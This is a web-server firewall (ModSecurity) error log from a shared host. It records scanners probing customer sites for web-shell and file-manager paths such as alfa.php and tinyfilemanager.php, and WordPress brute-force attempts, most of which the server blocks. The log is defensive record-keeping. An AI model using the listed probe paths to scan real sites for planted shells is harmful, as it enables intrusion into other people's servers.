[Tue May 26 14:23:03.887886 2026] [security2:error] [pid 606909:tid 607077] [client 20.226.60.108:14450] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahVfb10yRtX9qA7aVUVdigAAAKs"]
[Tue May 26 14:23:04.240474 2026] [security2:error] [pid 606909:tid 607101] [client 20.226.60.108:14464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/index.php"] [unique_id "ahVfcF0yRtX9qA7aVUVdjAAAAMM"]
[Tue May 26 14:23:04.240658 2026] [security2:error] [pid 606909:tid 607101] [client 20.226.60.108:14464] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/index.php"] [unique_id "ahVfcF0yRtX9qA7aVUVdjAAAAMM"]
[Tue May 26 14:23:04.606334 2026] [security2:error] [pid 606909:tid 607149] [client 20.226.60.108:19115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/upgrade/index.php"] [unique_id "ahVfcF0yRtX9qA7aVUVdjgAAAPM"]
[Tue May 26 14:23:04.606485 2026] [security2:error] [pid 606909:tid 607149] [client 20.226.60.108:19115] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/upgrade/index.php"] [unique_id "ahVfcF0yRtX9qA7aVUVdjgAAAPM"]
[Tue May 26 14:23:04.972313 2026] [security2:error] [pid 610693:tid 610871] [client 20.226.60.108:14453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/.well-known/gecko-litespeed.php"] [unique_id "ahVfcDvNO3hpmlY6M8RTUgAAADA"]
[Tue May 26 14:23:04.972447 2026] [security2:error] [pid 610693:tid 610871] [client 20.226.60.108:14453] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/.well-known/gecko-litespeed.php"] [unique_id "ahVfcDvNO3hpmlY6M8RTUgAAADA"]
[Tue May 26 14:23:05.337165 2026] [security2:error] [pid 610693:tid 610866] [client 20.226.60.108:42305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/ant.php"] [unique_id "ahVfcTvNO3hpmlY6M8RTWgAAACs"]
[Tue May 26 14:23:05.337282 2026] [security2:error] [pid 610693:tid 610866] [client 20.226.60.108:42305] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/ant.php"] [unique_id "ahVfcTvNO3hpmlY6M8RTWgAAACs"]
[Tue May 26 14:23:05.423844 2026] [security2:error] [pid 610693:tid 610872] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfcTvNO3hpmlY6M8RTVQAAADE"]
[Tue May 26 14:23:05.700415 2026] [security2:error] [pid 610693:tid 610909] [client 20.226.60.108:42342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/autoload_classmap.php"] [unique_id "ahVfcTvNO3hpmlY6M8RTXAAAAFY"]
[Tue May 26 14:23:05.700549 2026] [security2:error] [pid 610693:tid 610909] [client 20.226.60.108:42342] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/autoload_classmap.php"] [unique_id "ahVfcTvNO3hpmlY6M8RTXAAAAFY"]
[Tue May 26 14:23:06.056283 2026] [security2:error] [pid 610693:tid 610880] [client 20.226.60.108:39170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/storage/rip.php"] [unique_id "ahVfcjvNO3hpmlY6M8RTYAAAADk"]
[Tue May 26 14:23:06.056410 2026] [security2:error] [pid 610693:tid 610880] [client 20.226.60.108:39170] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/storage/rip.php"] [unique_id "ahVfcjvNO3hpmlY6M8RTYAAAADk"]
[Tue May 26 14:23:06.408860 2026] [security2:error] [pid 606909:tid 607103] [client 20.226.60.108:39867] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/tinyfilemanager.php"] [unique_id "ahVfcl0yRtX9qA7aVUVdowAAAMU"]
[Tue May 26 14:23:06.408965 2026] [security2:error] [pid 606909:tid 607103] [client 20.226.60.108:39867] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/tinyfilemanager.php"] [unique_id "ahVfcl0yRtX9qA7aVUVdowAAAMU"]
[Tue May 26 14:23:06.872936 2026] [security2:error] [pid 606909:tid 607117] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfcl0yRtX9qA7aVUVdpQAAANM"]
[Tue May 26 14:23:06.895291 2026] [security2:error] [pid 606909:tid 607109] [client 20.226.60.108:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVfcl0yRtX9qA7aVUVdrQAAAMs"]
[Tue May 26 14:23:06.895336 2026] [security2:error] [pid 606909:tid 607109] [client 20.226.60.108:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVfcl0yRtX9qA7aVUVdrQAAAMs"]
[Tue May 26 14:23:06.895742 2026] [security2:error] [pid 610693:tid 610937] [client 20.226.60.108:46603] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/wp-includes/bk/"] [unique_id "ahVfcjvNO3hpmlY6M8RTZwAAAHI"]
[Tue May 26 14:23:07.424590 2026] [security2:error] [pid 610693:tid 610932] [client 20.226.60.108:46603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/403.php"] [unique_id "ahVfczvNO3hpmlY6M8RTcQAAAG0"]
[Tue May 26 14:23:07.424739 2026] [security2:error] [pid 610693:tid 610932] [client 20.226.60.108:46603] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/403.php"] [unique_id "ahVfczvNO3hpmlY6M8RTcQAAAG0"]
[Tue May 26 14:23:07.447665 2026] [security2:error] [pid 606909:tid 606988] [remote 45.250.255.226:57632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVfc10yRtX9qA7aVUVdtwAAsk4"]
[Tue May 26 14:23:07.777564 2026] [security2:error] [pid 606909:tid 607053] [client 20.226.60.108:48840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/av.php"] [unique_id "ahVfc10yRtX9qA7aVUVdwgAAAJM"]
[Tue May 26 14:23:07.777699 2026] [security2:error] [pid 606909:tid 607053] [client 20.226.60.108:48840] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/av.php"] [unique_id "ahVfc10yRtX9qA7aVUVdwgAAAJM"]
[Tue May 26 14:23:08.142039 2026] [security2:error] [pid 610693:tid 610896] [client 20.226.60.108:22382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/tool.php"] [unique_id "ahVfdDvNO3hpmlY6M8RTfwAAAEk"]
[Tue May 26 14:23:08.142163 2026] [security2:error] [pid 610693:tid 610896] [client 20.226.60.108:22382] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/tool.php"] [unique_id "ahVfdDvNO3hpmlY6M8RTfwAAAEk"]
[Tue May 26 14:23:08.812881 2026] [security2:error] [pid 606909:tid 607097] [client 4.201.75.230:5479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/chosen.php"] [unique_id "ahVfdF0yRtX9qA7aVUVdzQAAAL8"]
[Tue May 26 14:23:09.034512 2026] [security2:error] [pid 610693:tid 610835] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfdDvNO3hpmlY6M8RThgAAAAw"]
[Tue May 26 14:23:10.227934 2026] [security2:error] [pid 606909:tid 607082] [client 202.141.83.254:19725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfdl0yRtX9qA7aVUVd3wAAALA"]
[Tue May 26 14:23:10.228104 2026] [security2:error] [pid 606909:tid 607082] [client 202.141.83.254:19725] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfdl0yRtX9qA7aVUVd3wAAALA"]
[Tue May 26 14:23:11.169723 2026] [security2:error] [pid 606909:tid 607056] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfdl0yRtX9qA7aVUVd6QAAAJY"]
[Tue May 26 14:23:11.715765 2026] [security2:error] [pid 610693:tid 610907] [client 20.116.59.164:15321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVfdzvNO3hpmlY6M8RTswAAAFQ"]
[Tue May 26 14:23:11.715934 2026] [security2:error] [pid 610693:tid 610907] [client 20.116.59.164:15321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVfdzvNO3hpmlY6M8RTswAAAFQ"]
[Tue May 26 14:23:12.629222 2026] [security2:error] [pid 606909:tid 607046] [client 14.188.240.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfeF0yRtX9qA7aVUVeAQAAAIw"]
[Tue May 26 14:23:12.740362 2026] [security2:error] [pid 610693:tid 610829] [client 20.116.59.164:15316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/admin.php"] [unique_id "ahVfeDvNO3hpmlY6M8RTwgAAAAY"]
[Tue May 26 14:23:12.740481 2026] [security2:error] [pid 610693:tid 610829] [client 20.116.59.164:15316] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/admin.php"] [unique_id "ahVfeDvNO3hpmlY6M8RTwgAAAAY"]
[Tue May 26 14:23:13.689520 2026] [security2:error] [pid 610693:tid 610865] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfeTvNO3hpmlY6M8RTzwAAACo"]
[Tue May 26 14:23:14.208800 2026] [security2:error] [pid 610693:tid 610926] [client 47.128.46.80:64032] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahVfejvNO3hpmlY6M8RT3QAAAGc"]
[Tue May 26 14:23:14.307900 2026] [security2:error] [pid 606909:tid 607159] [client 20.116.59.164:15327] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/goods.php"] [unique_id "ahVfel0yRtX9qA7aVUVeEwAAAP0"]
[Tue May 26 14:23:14.308034 2026] [security2:error] [pid 606909:tid 607159] [client 20.116.59.164:15327] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/goods.php"] [unique_id "ahVfel0yRtX9qA7aVUVeEwAAAP0"]
[Tue May 26 14:23:14.857852 2026] [cgid:error] [pid 610693:tid 610940] [client 45.156.129.167:37746] AH01264: stderr from /home2/svijakqj/shirdisaibabatemple.org/cgi-bin/authLogin.cgi: script not found or unable to stat
[Tue May 26 14:23:14.887508 2026] [security2:error] [pid 610693:tid 610943] [client 20.116.59.164:15245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/public/css.php"] [unique_id "ahVfejvNO3hpmlY6M8RT6wAAAHg"]
[Tue May 26 14:23:14.887651 2026] [security2:error] [pid 610693:tid 610943] [client 20.116.59.164:15245] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/public/css.php"] [unique_id "ahVfejvNO3hpmlY6M8RT6wAAAHg"]
[Tue May 26 14:23:15.115984 2026] [security2:error] [pid 606909:tid 607162] [client 160.119.76.58:58028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/xmlrpc.php"] [unique_id "ahVfel0yRtX9qA7aVUVeGQAAAQA"]
[Tue May 26 14:23:15.611996 2026] [security2:error] [pid 610693:tid 610826] [client 20.116.59.164:15252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/alfa.php"] [unique_id "ahVfezvNO3hpmlY6M8RT-AAAAAM"]
[Tue May 26 14:23:15.612089 2026] [security2:error] [pid 610693:tid 610826] [client 20.116.59.164:15252] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/alfa.php"] [unique_id "ahVfezvNO3hpmlY6M8RT-AAAAAM"]
[Tue May 26 14:23:15.733266 2026] [security2:error] [pid 606909:tid 607107] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfe10yRtX9qA7aVUVeIAAAAMk"]
[Tue May 26 14:23:16.082499 2026] [security2:error] [pid 610693:tid 610934] [client 20.116.59.164:15308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/css.php"] [unique_id "ahVffDvNO3hpmlY6M8RT_QAAAG8"]
[Tue May 26 14:23:16.082639 2026] [security2:error] [pid 610693:tid 610934] [client 20.116.59.164:15308] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/css.php"] [unique_id "ahVffDvNO3hpmlY6M8RT_QAAAG8"]
[Tue May 26 14:23:16.915130 2026] [security2:error] [pid 610693:tid 610882] [client 4.201.75.230:5473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/defaults.php"] [unique_id "ahVffDvNO3hpmlY6M8RUCwAAADs"]
[Tue May 26 14:23:17.075162 2026] [security2:error] [pid 610693:tid 610905] [client 20.116.59.164:15302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/classwithtostring.php"] [unique_id "ahVffTvNO3hpmlY6M8RUDQAAAFI"]
[Tue May 26 14:23:17.075273 2026] [security2:error] [pid 610693:tid 610905] [client 20.116.59.164:15302] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/classwithtostring.php"] [unique_id "ahVffTvNO3hpmlY6M8RUDQAAAFI"]
[Tue May 26 14:23:17.154757 2026] [security2:error] [pid 606909:tid 607142] [client 160.119.76.58:58074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahVffV0yRtX9qA7aVUVeLQAAAOw"]
[Tue May 26 14:23:17.797201 2026] [security2:error] [pid 610693:tid 610867] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVffTvNO3hpmlY6M8RUDwAAACw"]
[Tue May 26 14:23:18.092070 2026] [security2:error] [pid 610693:tid 610912] [client 160.119.76.58:58110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/xmlrpc.php"] [unique_id "ahVffjvNO3hpmlY6M8RUGAAAAFk"]
[Tue May 26 14:23:18.301373 2026] [security2:error] [pid 610693:tid 610923] [client 20.116.59.164:15331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/aa.php"] [unique_id "ahVffjvNO3hpmlY6M8RUGwAAAGQ"]
[Tue May 26 14:23:18.301528 2026] [security2:error] [pid 610693:tid 610923] [client 20.116.59.164:15331] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/aa.php"] [unique_id "ahVffjvNO3hpmlY6M8RUGwAAAGQ"]
[Tue May 26 14:23:18.539793 2026] [security2:error] [pid 610693:tid 610906] [client 160.119.76.58:58116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/xmlrpc.php"] [unique_id "ahVffjvNO3hpmlY6M8RUHwAAAFM"]
[Tue May 26 14:23:19.166806 2026] [security2:error] [pid 606909:tid 607120] [client 160.119.76.58:58128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVff10yRtX9qA7aVUVePgAAANY"]
[Tue May 26 14:23:19.434237 2026] [security2:error] [pid 610693:tid 610916] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVffzvNO3hpmlY6M8RUKgAAAF0"]
[Tue May 26 14:23:19.572429 2026] [security2:error] [pid 610693:tid 610842] [client 20.116.59.164:15246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/0x.php"] [unique_id "ahVffzvNO3hpmlY6M8RUNQAAABM"]
[Tue May 26 14:23:19.572537 2026] [security2:error] [pid 610693:tid 610842] [client 20.116.59.164:15246] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/0x.php"] [unique_id "ahVffzvNO3hpmlY6M8RUNQAAABM"]
